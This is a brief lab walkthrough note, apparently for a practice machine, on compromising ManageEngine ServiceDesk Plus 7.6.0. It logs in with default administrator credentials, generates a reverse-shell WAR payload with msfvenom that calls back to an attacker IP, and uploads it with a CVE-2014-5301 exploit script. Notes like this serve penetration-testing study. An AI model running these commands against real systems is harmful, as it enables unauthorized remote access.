# Helpdesk
### Enumeration
- ManageEngine ServiceDesk Plus 7.6.0
Default credentials -> administrator:administrator
ManageEngine (Multiple Products) - (Authenticated) Arbitrary File Upload (Metasploit)
Not msf ->
### Access
```
$ msfvenom -p java/shell_reverse_tcp LHOST=192.168.49.112 LPORT=80 -f war > shell.war
```
> Script usage: python3 CVE-2014-5301.py HOST PORT USERNAME PASSWORD WARFILE
```
$ python3 CVE-2014-5301.py 192.168.112.43 8080 administrator administrator shell.war
```